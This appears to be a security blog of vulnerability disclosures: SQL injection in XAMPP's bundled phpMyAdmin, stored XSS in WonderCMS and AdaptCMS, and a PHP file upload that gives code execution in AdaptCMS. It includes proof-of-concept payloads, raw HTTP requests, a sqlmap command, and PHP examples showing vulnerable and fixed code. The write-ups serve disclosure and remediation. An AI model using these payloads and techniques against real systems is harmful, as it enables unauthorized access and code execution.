Tuesday 27 February 2024

SQL Injection - xamppv5.6.40

Description

- It was found that XAMPP version 5.6.40 (bundled phpMyAdmin) suffers from authenticated, error-based SQL injection
- The Export template functionality (tbl_export.php, "templateId" parameter) is vulnerable


SQL Injection

Steps to Reproduce:

  1. Log in to phpMyAdmin
  2. Visit Export > New Template > test > Create
  3. Navigate to "Existing Templates"
  4. Select template "test" and click "Update"
  5. Intercept the HTTP POST request
  6. Place a single quote in the "templateId" parameter


// HTTP POST request

POST /phpmyadmin/tbl_export.php HTTP/1.1
Host: 192.168.159.128
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

ajax_request=true&server=1&db=&table=&exportType=server&templateAction=load&templateId=1'&_nocache=170904357625092438&token=%5D%7BwM4%22xq%26%3C%7Fioycy


// HTTP response

HTTP/1.1 200 OK
Date: Tue, 27 Feb 2024 16:44:09 GMT
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]

{"success":false,"error":"#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '\\' AND `username` = 'root'' at line 1"}


// sqlmap fingerprint

sqlmap -r request.txt --dbms=mysql --threads 10 --level 5 --risk 3 --fingerprint

[...]
[16:55:00] [INFO] confirming MySQL
[16:55:01] [INFO] the back-end DBMS is MySQL
[16:55:01] [INFO] actively fingerprinting MySQL
[16:55:02] [INFO] executing MySQL comment injection fingerprint
web application technology: PHP 5.6.40, Apache 2.4.37
back-end DBMS: active fingerprint: MySQL >= 5.5
               comment injection fingerprint: MySQL 5.6.52
               fork fingerprint: MariaDB
[...]
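
For reference, here is the difference between the query shape that produces the error above and a fixed one. This is an illustrative PHP example added to this post, not phpMyAdmin's source: the table and column names (export_templates, template_data), the function names and the exact query are assumed from the error text, and an in-memory SQLite database stands in for MariaDB so it runs anywhere PDO is available.

```php
<?php
declare(strict_types=1);

// Illustrative code added to this post; it is not phpMyAdmin's source.
// The error text returned above ("... '\' AND `username` = 'root'' at line 1")
// shows the shape of the query: the template row is looked up by templateId
// and the current user. Table and column names below are assumed.

// Vulnerable shape: the request parameter is concatenated into the SQL text,
// so a single quote in templateId changes the statement, and the DBMS error
// is passed straight back to the browser (error-based injection).
function loadTemplateVulnerable(PDO $db, string $templateId, string $username): ?array
{
    $sql = "SELECT `template_data` FROM `export_templates`"
         . " WHERE `id` = '" . $templateId . "' AND `username` = '" . $username . "'";
    try {
        $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
        return $row === false ? null : $row;
    } catch (PDOException $e) {
        // Mirrors the observed behaviour: the raw "#1064 ..." text becomes the response.
        throw new RuntimeException('{"success":false,"error":"' . $e->getMessage() . '"}');
    }
}

// Hardened shape: validate the type, bind parameters, log the real error
// server-side and return only a generic failure to the client.
function loadTemplateSafe(PDO $db, string $templateId, string $username): ?array
{
    if (!ctype_digit($templateId)) {
        return null;                // "1'" never reaches the database
    }
    $stmt = $db->prepare(
        'SELECT `template_data` FROM `export_templates` WHERE `id` = :id AND `username` = :user'
    );
    try {
        $stmt->execute([':id' => (int) $templateId, ':user' => $username]);
    } catch (PDOException $e) {
        error_log('export template lookup failed: ' . $e->getMessage());
        return null;                // client sees "not found", not the SQL error
    }
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo on an in-memory SQLite database standing in for MariaDB.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE `export_templates` (`id` INTEGER PRIMARY KEY, `username` TEXT, `template_data` TEXT)');
$db->exec("INSERT INTO `export_templates` VALUES (1, 'root', 'test')");

$fromRequest = "1'";  // templateId exactly as sent in the request above

try {
    loadTemplateVulnerable($db, $fromRequest, 'root');
} catch (RuntimeException $e) {
    echo 'vulnerable: ', $e->getMessage(), PHP_EOL;   // SQL syntax error reaches the client
}
var_dump(loadTemplateSafe($db, $fromRequest, 'root')); // rejected before any SQL runs
var_dump(loadTemplateSafe($db, '1', 'root'));          // returns the stored template row
```

ctype_digit also rejects an empty value and anything signed, so the integer cast never sees a surprise. Catching the PDOException and logging it server-side is what closes the error-based channel: with the vulnerable shape the "success":false JSON above carries the full MariaDB error text, which is exactly what sqlmap keys on when it confirms and fingerprints the backend.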


Friday 23 February 2024

Stored XSS - wondercmsv3.4.3


Description

- It was found that the "Current Page" > "Page Title" setting suffers from stored cross-site scripting
- Valid credentials are required in order to access the functionality


Stored XSS


Steps to Reproduce:

  1. Log in and browse to "Settings"
  2. Open "Current Page" > "Page Title"
  3. Enter the following payload into "Page Title": "><a onmouseover=alert(1) style=display:block>XSS</a>


// HTTP POST request

POST /wondercms HTTP/2
Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
[...]

[...]content=%22%3E%3Ca%20onmouseover%3Dalert(1)%20style%3Ddisplay%3Ablock%3EXSS%3C%2Fa%3E&target=pages&menu=&visibility=


// HTTP response

HTTP/2 200 OK
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
[...]

[...]
<meta name="title" content="Website title - "><a onmouseover=alert(1) style=display:block>XSS</a>" />
[...]

Monday 5 February 2024

Stored XSS and RCE - adaptcmsv3.0.3

Description

- It was found that AdaptCMS v3.0.3 is vulnerable to stored cross-site scripting via the article title
- The file upload functionality also allows PHP files to be uploaded, which results in remote code execution


Stored XSS


Steps to Reproduce:

  1. Log in as admin and add a new article
  2. In "Title" add the following payload: <svg><animate onbegin=alert(1) attributeName=x dur=1s>
  3. The stored XSS is triggered when a normal user visits the article

// HTTP POST request

POST /adaptcms/admin/articles/preview/?preview=1 HTTP/1.1

Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

_method=PUT&data%5B_Token%5D%5Bkey%5D=357ba58e7871f0849edd3c623771a379e2fc1a2c&data%5BArticle%5D%5Btitle%5D=%3Csvg%3E%3Canimate+onbegin%3Dalert(1)+attributeName%3Dx+dur%3D1s%3E&data%5BArticleValue%5D%5B0%5D%5Bdata%5D=%3Cp%3ETest%3C%2Fp%3E[...]


// HTTP GET request

GET /adaptcms/admin/articles/preview HTTP/1.1
Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
[...]

[...]
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>
AdaptCMS 3.0.3 | <svg><animate onbegin=alert(1) attributeName=x dur=1s> </title>
[...]
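
The WonderCMS finding above (23 February) and this AdaptCMS one are the same bug in two output contexts: a stored title echoed raw into a double-quoted attribute value, and into the <title> element. The PHP below is an illustrative example added to this post, not code from either project; the function names and the exact template strings are assumed, and the two stored values are the payloads already shown in the write-ups.

```php
<?php
declare(strict_types=1);

// Illustrative code added to this post; it is not WonderCMS's or AdaptCMS's source.
// Both findings store an attacker-controlled title and echo it into HTML:
// WonderCMS inside a double-quoted attribute (<meta name="title" content="...">),
// AdaptCMS inside the <title> element. Function and variable names are assumed.

// Vulnerable rendering, matching the responses shown in the write-ups.
function renderMetaVulnerable(string $siteTitle, string $pageTitle): string
{
    return '<meta name="title" content="' . $siteTitle . ' - ' . $pageTitle . '" />';
}

function renderTitleVulnerable(string $app, string $pageTitle): string
{
    return '<title>' . $app . ' | ' . $pageTitle . '</title>';
}

// Hardened rendering: encode at the output sink. ENT_QUOTES encodes both
// quote characters so a value cannot close the attribute it sits in;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderMetaSafe(string $siteTitle, string $pageTitle): string
{
    return '<meta name="title" content="' . h($siteTitle . ' - ' . $pageTitle) . '" />';
}

function renderTitleSafe(string $app, string $pageTitle): string
{
    return '<title>' . h($app . ' | ' . $pageTitle) . '</title>';
}

// The two stored values from the write-ups, as they would come back from the
// database after being saved through the admin forms.
$wonderTitle = '"><a onmouseover=alert(1) style=display:block>XSS</a>';
$adaptTitle  = '<svg><animate onbegin=alert(1) attributeName=x dur=1s>';

// Attribute context: the raw version lets the quote close the content="..."
// attribute; the encoded version keeps the whole value inside it.
echo renderMetaVulnerable('Website title', $wonderTitle), PHP_EOL;
echo renderMetaSafe('Website title', $wonderTitle), PHP_EOL;

// Element context: the raw version writes markup into <title>; the encoded
// version turns every < and > into an entity.
echo renderTitleVulnerable('AdaptCMS 3.0.3', $adaptTitle), PHP_EOL;
echo renderTitleSafe('AdaptCMS 3.0.3', $adaptTitle), PHP_EOL;
```

One caveat worth knowing when triaging the AdaptCMS case: <title> is an RCDATA element, so tags inside it are inert until a </title> sequence closes it, and the same stored title is normally rendered again in the article body and listing pages. Encoding has to happen at every sink, not only the one that shows up in the first response; a Content-Security-Policy without 'unsafe-inline' is the second layer if one sink is missed.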


Unrestricted File Upload


Steps to Reproduce:

  1. Log in as admin and visit the "Media" page
  2. Click on "Files", then use the "Add File" functionality
  3. In "File Contents" add the following PHP code: <?php phpinfo(); ?>

// HTTP POST request

POST /adaptcms/admin/files/add HTTP/1.1
Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]

[...]
------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[0][File][dir]"

uploads/
------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[0][File][mimetype]"


------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[0][File][filesize]"


------WebKitFormBoundaryVO2wc6i6YcQWk3oU
Content-Disposition: form-data; name="data[File][content]"

<?php phpinfo(); ?>
------WebKitFormBoundaryVO2wc6i6YcQWk3oU
[...]

// HTTP response

HTTP/1.1 302 Found
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
Location: http://192.168.232.133/adaptcms/admin/files
[...]


// HTTP GET request

GET /adaptcms/uploads/test-php.php HTTP/1.1
Host: 192.168.232.133
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
[...]


// HTTP response

HTTP/1.1 200 OK
Server: Apache/2.4.37 (Unix) OpenSSL/1.0.2q PHP/5.6.40 mod_perl/2.0.8-dev Perl/v5.16.3
X-Powered-By: PHP/5.6.40
[...]

[...]
<h1 class="p">PHP Version 5.6.40</h1>
</td></tr>
</table>
<table>
<tr><td class="e">System </td><td class="v">Linux ubuntu 6.5.0-15-generic #15~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Jan 12 18:54:30 UTC 2 x86_64 </td></tr>
[...]
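
What the "Add File" handler is missing, as an illustrative PHP example added to this post (not AdaptCMS's code; the function name, the allowlist and the result array shape are assumed). It runs the uploaded content from the write-up, the same content renamed to an image extension, and a constructed minimal PNG header through the same checks.

```php
<?php
declare(strict_types=1);

// Illustrative code added to this post; it is not AdaptCMS's source.
// The "Add File" handler above accepted PHP source as file content and wrote it
// under the web root, where Apache executed it. The checks below are what such
// a handler is missing; names are assumed.

// Extension allowlist mapped to the MIME type the content must actually have.
const UPLOAD_ALLOWED = [
    'png'  => 'image/png',
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'gif'  => 'image/gif',
    'pdf'  => 'application/pdf',
];

// Returns ['ok' => bool, 'reason' => string] plus 'stored_as' on success.
function checkUpload(string $originalName, string $content): array
{
    // Only the final extension counts, lower-cased; denylisting ".php" is not
    // enough (.phtml, .phar, .PHP, and "x.php.png" on mis-configured servers).
    $ext = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!isset(UPLOAD_ALLOWED[$ext])) {
        return ['ok' => false, 'reason' => "extension '$ext' is not allowed"];
    }

    // Sniff the content with libmagic rather than trusting the client's
    // "mimetype" form field (which the request above left empty anyway).
    $detected = (new finfo(FILEINFO_MIME_TYPE))->buffer($content);
    if ($detected !== UPLOAD_ALLOWED[$ext]) {
        return ['ok' => false, 'reason' => "content looks like $detected, not " . UPLOAD_ALLOWED[$ext]];
    }

    // Discard the user-supplied name: random basename plus the validated extension.
    // The file should then go to a directory outside DocumentRoot, or one where
    // script execution is disabled, and be served with its validated MIME type.
    $storedAs = bin2hex(random_bytes(16)) . '.' . $ext;
    return ['ok' => true, 'reason' => 'accepted', 'stored_as' => $storedAs];
}

// Constructed inputs: the upload from the write-up, the same content under an
// image extension, and a minimal PNG signature plus IHDR chunk header.
$phpSource = '<?php phpinfo(); ?>';
$pngHeader = "\x89PNG\r\n\x1a\n" . "\x00\x00\x00\x0dIHDR" . pack('NN', 1, 1) . "\x08\x06\x00\x00\x00";

foreach ([
    ['test-php.php', $phpSource],   // rejected on extension
    ['test-php.png', $phpSource],   // rejected on sniffed content
    ['logo.png',     $pngHeader],   // accepted and renamed
] as [$name, $content]) {
    $r = checkUpload($name, $content);
    printf("%-14s %s: %s%s", $name, $r['ok'] ? 'ACCEPT' : 'REJECT', $r['reason'],
           isset($r['stored_as']) ? " -> {$r['stored_as']}" : '');
    echo PHP_EOL;
}
```

Even with these checks in place, the upload directory should not be able to execute scripts: keep it outside DocumentRoot, or turn the PHP engine off for it (php_admin_flag engine off in the Apache <Directory> block covering uploads/), so that a validation bypass stays a stored file rather than becoming code execution as it did here.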

Update on Full Disclosure

Lately I have not been posting anything related to Exploit-DB or Full Disclosure. Basically I have lost all of my source code review VMs and tools that I had. Unfortunately I did not have backups, and my laptop SSD died...

So soon I will be posting several newly discovered vulnerabilities of my own.


Stay safe.

Friday Fun Pentest Series - 5 - spa-cartcmsv1.9.0.6

Description - It was found that the application suffers from business logic flaw - Additionally the application is vulnerable to username en...